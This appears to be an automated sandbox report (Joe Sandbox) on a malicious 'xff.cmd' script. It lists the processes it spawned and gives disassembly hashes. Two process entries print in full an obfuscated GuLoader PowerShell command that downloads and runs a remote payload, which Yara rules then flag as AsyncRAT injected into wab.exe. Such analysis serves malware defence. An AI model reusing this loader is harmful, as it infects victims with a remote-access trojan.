                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:15:02:56
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
                                                                                              Imagebase:0x7ff75f3f0000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:15:02:56
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff66e660000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:15:02:56
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;"
                                                                                              Imagebase:0x7ff6e3d50000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:15:02:56
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff66e660000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:15:02:58
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
                                                                                              Imagebase:0x7ff75f3f0000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:15:03:06
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;"
                                                                                              Imagebase:0xb10000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2632762679.0000000008AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2621078427.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2632901106.0000000009FF9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:15:03:06
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
                                                                                              Imagebase:0x1c0000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:10
                                                                                              Start time:15:03:34
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                              Imagebase:0x1b0000
                                                                                              File size:516'608 bytes
                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.3343246570.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.3343246570.0000000007DA3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Executed Functions

                                                                                                Function 00007FFD348B4049 Relevance: .7, Instructions: 668COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2941556648.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd348b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 04fce170948be31b33e6e603b52b26c3d58c024d2fcc416358c01dd19038a7cd
                                                                                                • Instruction ID: 13e7c0fc17ff98979a4cebb201856a19fee27f0958106fe7543258ef16f83569
                                                                                                • Opcode Fuzzy Hash: 04fce170948be31b33e6e603b52b26c3d58c024d2fcc416358c01dd19038a7cd
                                                                                                • Instruction Fuzzy Hash: 04223662A0EBCA0FE7969B2848B61A87FE0EF57614B1801FBD15DC71D3DE5CA805D381
                                                                                                Function 00007FFD347EAB89 Relevance: .4, Instructions: 402COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ca9c053420314f38e94fdeeacbc1394899e393d6711ca2111125d4907df6d1ef
                                                                                                • Instruction ID: c1443a74b88d1132da3f150a6a3d660758e7a14391fd3867429f8ad1cba6f8af
                                                                                                • Opcode Fuzzy Hash: ca9c053420314f38e94fdeeacbc1394899e393d6711ca2111125d4907df6d1ef
                                                                                                • Instruction Fuzzy Hash: 2BD18570A18A4E8FEBA8DF28C8957E977D1FB54301F04436ED80DC7295CF78A9858B81
                                                                                                Function 00007FFD347EB939 Relevance: .4, Instructions: 385COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5cf826229eed73c2a3ae6efc1090b42893ded9789a194653dcb19a9c01f3e7ee
                                                                                                • Instruction ID: a82cf7bd568f78408003ed8a3bc1cc536333a78047ce763824643fb01170ee5f
                                                                                                • Opcode Fuzzy Hash: 5cf826229eed73c2a3ae6efc1090b42893ded9789a194653dcb19a9c01f3e7ee
                                                                                                • Instruction Fuzzy Hash: 66D17670A1894D8FEBA8DF28C8A97E977D1FB54311F54432ED80DC7295CE78A9848BC1
                                                                                                Function 00007FFD348B522D Relevance: .4, Instructions: 369COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2941556648.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd348b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 54592def536bff4c741274f7c940e6c2810a2154814e6090019427aff62156d4
                                                                                                • Instruction ID: 72ee48a2bf1c7af7061de0c695ae25893d5c8e8cde181b3ebb17489549e1864c
                                                                                                • Opcode Fuzzy Hash: 54592def536bff4c741274f7c940e6c2810a2154814e6090019427aff62156d4
                                                                                                • Instruction Fuzzy Hash: 2CB12562B0EB8A0FEBE59B2858A45B97BE1EF57214B4801BBD14DC71E3DD5CAC05C381
                                                                                                Function 00007FFD347EC020 Relevance: .3, Instructions: 273COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2937548120.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd347e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 49f539acf0ce916c3b9534490eb00db3656006ff1a901dd517fe0ead97c5bf8c
                                                                                                • Instruction ID: e1be11cba2bd2c73594ef17833128e3c4a8971fa0d24575c088a8d0b24a33d1b
                                                                                                • Opcode Fuzzy Hash: 49f539acf0ce916c3b9534490eb00db3656006ff1a901dd517fe0ead97c5bf8c
                                                                                                • Instruction Fuzzy Hash: 1A81287071CA498FD798EB1CC4D5AB5B7E1FF99351B1406BDD08AC32A6DA2AF842C740
                                                                                                Function 00007FFD348B41E7 Relevance: .2, Instructions: 150COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.2941556648.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ffd348b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c81d9a9b4599eb987381d378a5a1814cfa164f209f2a9dc5c451d39d5e95c068
                                                                                                • Instruction ID: 45f958a5e0427e70678ffc4143c84d1336b477cbeeed809f51ecccebcc70a62d
                                                                                                • Opcode Fuzzy Hash: c81d9a9b4599eb987381d378a5a1814cfa164f209f2a9dc5c451d39d5e95c068
                                                                                                • Instruction Fuzzy Hash: EE412662F0EACA0FE7A5D72C44B21B86BE1EF56650B5801BAD11CC72E3DE5DEC44A341
                                                                                                Function 00007FFD348B5352 Relevance: .1, Instructions: 108COMMON
                                                                                                Download Yara Rule
